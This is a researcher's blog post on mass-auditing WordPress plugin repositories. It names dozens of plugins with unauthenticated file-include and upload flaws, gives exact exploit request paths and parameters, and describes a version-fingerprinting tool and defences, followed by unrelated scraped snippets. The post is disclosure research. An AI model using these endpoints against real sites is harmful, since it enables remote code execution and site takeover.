Today's post is kind of long, so I thought I should warn you in advance by adding an additional paragraph for you to read. I also wanted to provide download links for those who'd rather just read the code. It isn't the cleanest code in the world, so I apologize
in advance. I discuss what all of these are for and how they work later on in the post, so if you're confused and/or curious, read on. Downloads:
- Copies of the WordPress theme and plugin repositories can be grabbed via
torrent (Please note that the plugin repo has a few directories incomplete/missing; this can be fixed by running my checkout code)
- A new WordPress plugin fingerprinting tool,
wpfinger (download). This tool can infer detailed version information on just about every plugin in the WordPress repository.
This package also contains some useful libraries for checking out the repositories and scraping plugin rankings, as this is used in the fingerprinting tool.
Intro
After finding an
arbitrary file upload vulnerability in 1 Flash Gallery, I became curious as to how many other WordPress plugins made basic security mistakes. The 1 Flash Gallery plugin issue, it seems, is that they CTRL-C-V'd code from a project called
Uploadify, which has been known to be vulnerable
for quite awhile.
After realizing this, I became curious as to how many plugins make easy-to-spot security mistakes, such as reusing vulnerable libraries or doing such things as include($_REQUEST['lulz']). However, my curiosity was initially somewhat hampered by the fact
that downloading and auditing every WordPress plugin one at a time is not only a mind numbing task, but a herculean one as well. And, well, I'm incredibly lazy.
Getting the Repos
So what to do? Well, it turns out that WordPress is nice enough to have public repositories (http://plugins.svn.wordpress.org and
http://themes.svn.wordpress.org) containing all plugins that have ever been submitted, as well as every theme. This, of course, was exciting: I could just check this out, whip out some grep-fu,
and have my answers.
Alright, so maybe it isn't as simple as that. First, the plugin repo is huge: as is, it's taking up a good 80GB on one of my disks and contains approximately 12,000,000 files, thanks in no small part to subversion's insistence on creating ridiculous numbers
of internal files. This isn't all that suprising, however, given that the repo contains ~23,000 plugins.
As I found out in my initial failed attempts to grab the code, checking this out all at once with subversion is, as far as I can tell, impossible. After about 15-20 minutes of downloading, the checkout would error out, and I'd have to wait for SVN to reverify
everything it had already gotten. This got old quickly, so I came up with a hacked workaround: I wrote a quick script that simply checked out the individual repositories for every plugin and theme. Not very clean, but for my purposes, effective. A little over
a day later, I had all the themes and plugins, and it was time for some fun.
A side note: for those of you who would like to play with either of these, I'd recommend
grabbing the torrent, extracting it, and then running my checkout script in wpfinger in the directory above them. This will still get you the latest versions of all the plugins, but should take significantly less time and put less strain on everyone's servers.
Attack
Anyway, on to the vulnerabilities. During my scans I found remote unauthenticated code execution vulnerabilities in 36 plugins, varying in popularity from ~250 downloads to ~60,000. Finding them took essentially no effort or skill on my part, just patience.
The following eleven plugins were found entirely with grep and a little bit of manual inspection. Instead of running over every PHP file in the repo, I sped things up by only running over code in the trunk directories. This was under the assumption that
that should be the latest code. Pretty much all of these were found analyzing results from the same grep:
Grep used: egrep -i '(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)'
Base is http://host/wp-content/plugins/PLUGIN_NAME/ unless explicitly stated.
Remote File Include - unauthenticated
----------------------------------------------------------
- zingiri-web-shop = /fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
- mini-mail-dashboard-widget = wp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
- mailz = /lists/config/config.php?wpabspath=RFI
- relocate-upload = relocate-upload.php?ru_folder=asdf&abspath=RFI
- disclosure-policy-plugin = /functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI
- wordpress-console = /common.php POST="root=RFI"
- livesig = /livesig-ajax-backend.php POST="wp-root=RFI"
- annonces = /includes/lib/photo/uploadPhoto.php?abspath=RFI
- theme-tuner = /ajax/savetag.php POST="tt-abspath=RFI"
- evarisk = /include/lib/actionsCorrectives/activite/uploadPhotoApres.php?abspath=RFI
- light-post = /wp-light-post.php?abspath=RFI
Local File Include - unauthenticated
----------------------------------------------------------
- news-and-events = http://host/wordpress/?ktf=ne_LFIPATH%00
As an experiment, I also modified a nice static source analyzer called
RIPS to take command line arguments (grab here, if interested) and print out some basic information on probable vulnerabilities, and then ran it over
the plugin repo. Unfortunately, the noise was still pretty high (partly due to its lack of OO support), so I didn't find all too much beyond the greps. However, it did turn up a few RFIs:
- thecartpress = /checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
- allwebmenus-wordpress-menu-plugin = actions.php POST="abspath=RFI"
- wpeasystats = export.php?homep=RFI
Finally, I searched for Uploadify usage and outdated timthumb.php libraries. This turned up another 24 vulnerable plugins:
- user-avatar - /user-avatar-pic.php -> Only vulnerable if register_globals is enabled
- onswipe - /framework/thumb/thumb.php
- islidex - /js/timthumb.php
- seo-image-galleries - /timthumb.php
- verve-meta-boxes - /tools/timthumb.php
- dd-simple-photo-gallery - /include/resize.php
- wp-marketplace - /libs/timthumb.php
- a-gallery - /timthumb.php
- auto-attachments - /thumb.php
- cac-featured-content - /timthumb.php
- category-grid-view-gallery - /includes/timthumb.php
- category-list-portfolio-page - /scripts/timthumb.php
- cms-pack - /timthumb.php
- dp-thumbnail - /timthumb/timthumb.php
- extend-wordpress - /helpers/timthumb/image.php
- kino-gallery - /timthumb.php
- lisl-last-image-slider - /timthumb.php
- mediarss-external-gallery - /timthumb.php
- really-easy-slider - /inc/thumb.php
- rekt-slideshow - /picsize.php
- rent-a-car - /libs/timthumb.php
- vk-gallery - /lib/timthumb.php
- gpress = /gpress-admin/fieldtypes/styles_editor/scripts/uploadify.php?fileext=php - exact same as 1 Flash Plugin vuln
Obviously, it's not very hard to find a decent number of 0days just by grepping around, which is mildly disconcerting. Honestly, I had so many hits for these searches that I probably missed a good deal of them. But what else, besides vulnerability discovery,
can we do with all this data?
Fingerprint
As an attacker, it's always nice to be able to figure out exactly what code is running on a given server. Of course, this isn't usually possible, as it requires a large body of information that just isn't there. However, it becomes much, much easier when
you have access to the wealth of information contained in an SVN repo.
I feel that I should mention that
ethicalhack3r's awesome tool
WPScan does some of this, but last I checked will only detect if the top 2000 plugins are installed, and, as far as I know, won't give you a version. This is not to fault his work, though, at all; as I said, doing fine grained fingerprinting on every plugin
would normally be difficult to impossible in most circumstances, and his tool does a ton of stuff that wpfinger doesn't.
So what does the repo give us that we were missing before? Well, we of course have a list of all the plugins, and it is then trivial to grab all of their download stats from wordpress.org to sort them in order of popularity. In addition, we have not only
the current version of the plugin in the trunks, but we also (if SVN is being used properly) have tags for each of the major version changes. Simply by comparing these and finding changed files that we can check for remotely (added/removed/modified content
files or added/removed php scripts), we can build a very effective fingerprint for each version of the plugin. Then, all we have to do is run a small number of checks once we find that a plugin is installed to obtain, at the very least, the major version of
the plugin.
My current implementation is not pretty, but it seems to work quite well on the servers I tested with. My signatures are simply binary search trees encoded using Python tuples (don't judge me, it was quick to do it that way), which I regenerate whenever
I update the SVN. The initial fingerprinting takes quite awhile, as it stupidly MD5s all of the relevant files in the repos. This was before I knew that
filecmp/dircmp existed, so that's probably going to be rewritten soon enough.
Once the signatures are created, the scans are quite fast, and very effective. It normally only takes one to two requests to detect plugin presence, and only takes two or three more in most cases to detect the version. It also tries to deal with things like
error pages that return 200 by using difflib to compare the error page to the returned page, although there's probably still some issues with that.
As I mentioned earlier, you can check the
latest versions over on Google Code from now on. Here's a screenshot of a scan against one of my test servers:
Plugins + versions
Now that I've outlined more than enough ways to aid exploitation, let's talk briefly about what can be done to help prevent some of these attacks.
Defend
For the WordPress developers, the best defense would probably be to scan any commits for known vulnerabilities, and either warn or (preferably) block the developers from adding exploitable code to the repository. This can be done quite easily using pre-commit
hooks for SVN, which allow for custom verification of commits to a repository. I'm planning on releasing an example script when I get time that will detect commits introducing the vulnerabilities I scanned for, but the more interesting problem is how to gather
a larger, better collection of signatures. I've got a couple vague ideas for how to go about doing this, but would love suggestions on the subject.
As for what site admins can do, it's pretty clear: don't install plugins or themes unless you *absolutely* need to or you are willing to and have the expertise to audit what you're installing. Just because you have the latest version does not necessarily
make you safe, and if you forget to update, it's quite easy for an attacker to detect and exploit. In addition to limiting your number of installed plugins, it might be possible to parse the signatures I provide and use a WAF to return tainted results when
those URLs are requested too closely together. Haven't personally done it, but I'm sure it wouldn't be too extraordinarily difficult.
Conclusion
The methods presented here are not unique to WordPress; I'm fairly confident in saying that it could easily be applied to any open source CMS. I largely chose WordPress because I was already working with it when I stumbled into this, and they had a really
nice repository to pull from. Please feel free to try it out other places, and let me know how it goes.
P.S.: I'd like to thank
duststorm for lending me a server to seed the repos with. Much appreciated.
相关推荐
分享一个字典,只是为了分享,希望能减轻你在学安全路上的负担.
资源来自pypi官网。 资源全名:explo-0.2.2.tar.gz
「渗透测试」Momigari:Overview_of_the_latest_Windows_OS_kernel_exploits_found_in_the_wild - 安全漏洞 数据安全 安全活动 NGFW 技术分析安全人才
黑客攻击是解决创造性问题的艺术,无论是为了解决困难问题还是利用漏洞...为了以每个人都可以访问的方式分享黑客的艺术和科学,Hacking:The Explo of Exploitation,2nd Edition从黑客的角度介绍了C编程的基础知识。
开机报duihuakmicrosoft visual c++ runtime library ...This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information.
Array processing has played an important. role in many diverse... It appears that the third genera- tion of wireless systems will utilize adaptive array processing to achieve the desired system capacity.
has a “notes and further reading” section to help guide the reader to further explo- ration of specific topics. Where appropriate, we have also directly referenced research contributions to the fiel...
snmp remote root exploit BSD/OS 4.2 (查看系统是否有SNMP弱口令的主机或各种路由器
win7 32位的 c盘windows下 因为之前自己弄主题把他删了没备份,现在找回来了, 遇到同样问题的 下吧下吧~
2020年10月14日在EXPLO-SHS主题学校举行的决策树研讨会幻灯片。
Explo_Data_Analysis-Proj2 项目二 ###情节1: 绘制显示年份与美国全国排放量的图表。 情节 2: 绘制显示年份与巴尔的摩的图表。 情节 3: 绘制一个图表,显示类型(非道路、点、道路、非品脱)的年与排放量。 情节 ...
英文摘要(选填)This paper is based on the first phase of the model to continue to explo
音频马赛克探索测试要做:弄清楚如何将马赛克的每个部分变成一个包含 4-5 个图像而不是两个图像的迷你幻灯片。 错误:页面在 Chrome 上工作,但在 Firefox 上不工作——我认为用于获取图像模板的 querySelector ...
Cloudera Impala is an open source project that is opening up the Apache Hadoop software stack to...intelligence tools, and it’s fast enough to be used for interactive explo‐ ration and experimentation.
In this paper, the spherical models of cells light scattering were established based on Mie, and the distribution curves of scattering intensity in the range of 0~180 degrees were got to explo
自述文件这是在octomap(ROS)中进行3d探索的模拟。 版本0.1如何设置? git clone ... catkin_make roscore rosrun octomap_server octomap_server_node * .bt rosrun ./execu_file我要和谁说话?...
CursoDS_ProfDanilo:深度学习Python,基于深度学习的机器学习,基于统计学的基础知识和分类问题。 在YouTube上使用exploççesesteóricasestãoDisponíveis的视频
leetcode卡2020-June-LeetCoding-Challenge 分享我的想法和解决方案
leetcode 答案LeetCode-我的答案 leetcode 部分“热门面试问题”的答案:
leetcode卡leetcode_30_days_challenge_may2020